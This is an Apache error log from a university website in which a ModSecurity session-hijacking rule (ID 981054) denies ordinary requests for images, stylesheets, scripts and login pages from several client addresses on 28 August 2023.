[Mon Aug 28 08:15:18.519901 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv1JsCo-f0AAJSr2ysAAAAO"]
[Mon Aug 28 08:15:18.524050 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv1JsCo-f0AAJWfZMEAAAAI"]
[Mon Aug 28 08:15:18.563851 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv1JsCo-f0AAJSr2ywAAAAO"]
[Mon Aug 28 08:15:18.580375 2023] [:error] [pid 38340] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv1JsCo-f0AAJXEm-YAAAAM"]
[Mon Aug 28 08:15:18.598646 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv1JsCo-f0AAJUFNWsAAAAA"]
[Mon Aug 28 08:15:18.602440 2023] [:error] [pid 38339] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv1JsCo-f0AAJXDU30AAAAK"]
[Mon Aug 28 08:15:18.607509 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv1JsCo-f0AAJWfZMIAAAAI"]
[Mon Aug 28 08:15:18.635276 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv1JsCo-f0AAJOr@AkAAAAL"]
[Mon Aug 28 08:15:18.641149 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv1JsCo-f0AAJSr2y0AAAAO"]
[Mon Aug 28 08:15:18.644174 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv1JsCo-f0AAJUFNWwAAAAA"]
[Mon Aug 28 08:15:18.685293 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv1JsCo-f0AAJWfZMMAAAAI"]
[Mon Aug 28 08:15:18.689349 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv1JsCo-f0AAJOr@AoAAAAL"]
[Mon Aug 28 08:15:18.707218 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv1JsCo-f0AAJUFNW0AAAAA"]
[Mon Aug 28 08:15:18.822106 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv1JsCo-f0AAJSr2y4AAAAO"]
[Mon Aug 28 08:15:18.826661 2023] [:error] [pid 38150] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv1JsCo-f0AAJUGIZoAAAAC"]
[Mon Aug 28 08:15:18.829327 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv1JsCo-f0AAJTinfoAAAAE"]
[Mon Aug 28 08:15:18.847003 2023] [:error] [pid 38340] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv1JsCo-f0AAJXEm-cAAAAM"]
[Mon Aug 28 08:15:18.850993 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv1JsCo-f0AAJWfZMQAAAAI"]
[Mon Aug 28 08:15:18.852971 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv1JsCo-f0AAJSr2y8AAAAO"]
[Mon Aug 28 08:15:19.085505 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv1J8Co-f0AAJTinfsAAAAE"]
[Mon Aug 28 08:15:19.229094 2023] [:error] [pid 38150] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv1J8Co-f0AAJUGIZsAAAAC"]
[Mon Aug 28 08:16:47.275995 2023] [:error] [pid 38375] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv1f8Co-f0AAJXn9rkAAAAB"]
[Mon Aug 28 08:16:47.547243 2023] [:error] [pid 37803] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv1f8Co-f0AAJOr@BoAAAAL"]
[Mon Aug 28 08:16:57.388012 2023] [:error] [pid 38303] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv1icCo-f0AAJWfZNkAAAAI"]
[Mon Aug 28 08:16:57.637309 2023] [:error] [pid 38375] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv1icCo-f0AAJXn9rwAAAAB"]
[Mon Aug 28 08:17:00.264435 2023] [:error] [pid 38375] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv1jMCo-f0AAJXn9r4AAAAB"]
[Mon Aug 28 08:17:00.328648 2023] [:error] [pid 38149] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv1jMCo-f0AAJUFNYIAAAAA"]
[Mon Aug 28 08:17:00.334526 2023] [:error] [pid 38303] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv1jMCo-f0AAJWfZNsAAAAI"]
[Mon Aug 28 08:17:00.448940 2023] [:error] [pid 38149] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv1jMCo-f0AAJUFNYMAAAAA"]
[Mon Aug 28 08:17:00.636741 2023] [:error] [pid 38303] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv1jMCo-f0AAJWfZNwAAAAI"]
[Mon Aug 28 08:17:53.291658 2023] [:error] [pid 37803] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv1wcCo-f0AAJOr@CkAAAAL"]
[Mon Aug 28 08:18:50.664536 2023] [:error] [pid 37539] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv1@sCo-f0AAJKjaFkAAAAG"]
[Mon Aug 28 08:18:53.289442 2023] [:error] [pid 38388] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv1-cCo-f0AAJX0cBYAAAAR"]
[Mon Aug 28 08:18:55.946804 2023] [:error] [pid 38149] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv1-8Co-f0AAJUFNZ0AAAAA"]
[Mon Aug 28 08:19:16.507612 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv2FMCo-f0AAJXyN3EAAAAM"]
[Mon Aug 28 08:19:26.257657 2023] [:error] [pid 38149] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv2HsCo-f0AAJUFNaQAAAAA"]
[Mon Aug 28 08:19:34.796368 2023] [:error] [pid 38379] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv2JsCo-f0AAJXrIpEAAAAP"]
[Mon Aug 28 08:19:35.055343 2023] [:error] [pid 38338] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2J8Co-f0AAJXCvswAAAAJ"]
[Mon Aug 28 08:21:16.751348 2023] [:error] [pid 38388] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv2jMCo-f0AAJX0cDoAAAAR"]
[Mon Aug 28 08:21:16.781009 2023] [:error] [pid 38379] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv2jMCo-f0AAJXrIqUAAAAP"]
[Mon Aug 28 08:21:16.788117 2023] [:error] [pid 38149] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv2jMCo-f0AAJUFNbYAAAAA"]
[Mon Aug 28 08:21:16.862911 2023] [:error] [pid 38378] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv2jMCo-f0AAJXqX2kAAAAF"]
[Mon Aug 28 08:21:43.450482 2023] [:error] [pid 38388] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv2p8Co-f0AAJX0cD8AAAAR"]
[Mon Aug 28 08:21:43.453562 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv2p8Co-f0AAJKjaHoAAAAG"]
[Mon Aug 28 08:21:43.465528 2023] [:error] [pid 38338] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv2p8Co-f0AAJXCvuUAAAAJ"]
[Mon Aug 28 08:21:43.472568 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv2p8Co-f0AAJTinisAAAAE"]
[Mon Aug 28 08:21:45.784578 2023] [:error] [pid 38386] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv2qcCo-f0AAJXyN48AAAAM"]
[Mon Aug 28 08:21:50.222948 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv2rsCo-f0AAJKjaHwAAAAG"]
[Mon Aug 28 08:21:51.147608 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2r8Co-f0AAJTiniwAAAAE"]
[Mon Aug 28 08:22:19.629076 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv2y8Co-f0AAJTinjIAAAAE"]
[Mon Aug 28 08:22:24.836006 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv20MCo-f0AAJXyN5cAAAAM"]
[Mon Aug 28 08:22:24.910662 2023] [:error] [pid 38065] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv20MCo-f0AAJSxY5gAAAAH"]
[Mon Aug 28 08:22:24.920661 2023] [:error] [pid 38378] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv20MCo-f0AAJXqX3kAAAAF"]
[Mon Aug 28 08:22:24.940406 2023] [:error] [pid 38379] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv20MCo-f0AAJXrIrQAAAAP"]
[Mon Aug 28 08:22:24.990642 2023] [:error] [pid 38388] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv20MCo-f0AAJX0cEYAAAAR"]
[Mon Aug 28 08:22:26.205549 2023] [:error] [pid 38378] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv20sCo-f0AAJXqX3oAAAAF"]
[Mon Aug 28 08:22:27.580080 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv208Co-f0AAJTinjQAAAAE"]
[Mon Aug 28 08:22:29.260482 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv21cCo-f0AAJX1kgkAAAAS"]
[Mon Aug 28 08:22:29.635593 2023] [:error] [pid 38065] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv21cCo-f0AAJSxY5kAAAAH"]
[Mon Aug 28 08:22:41.951425 2023] [:error] [pid 38388] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv24cCo-f0AAJX0cEkAAAAR"]
[Mon Aug 28 08:22:42.080500 2023] [:error] [pid 38149] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv24sCo-f0AAJUFNcMAAAAA"]
[Mon Aug 28 08:22:44.310570 2023] [:error] [pid 38065] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv25MCo-f0AAJSxY5wAAAAH"]
[Mon Aug 28 08:22:44.430522 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv25MCo-f0AAJXyN50AAAAM"]
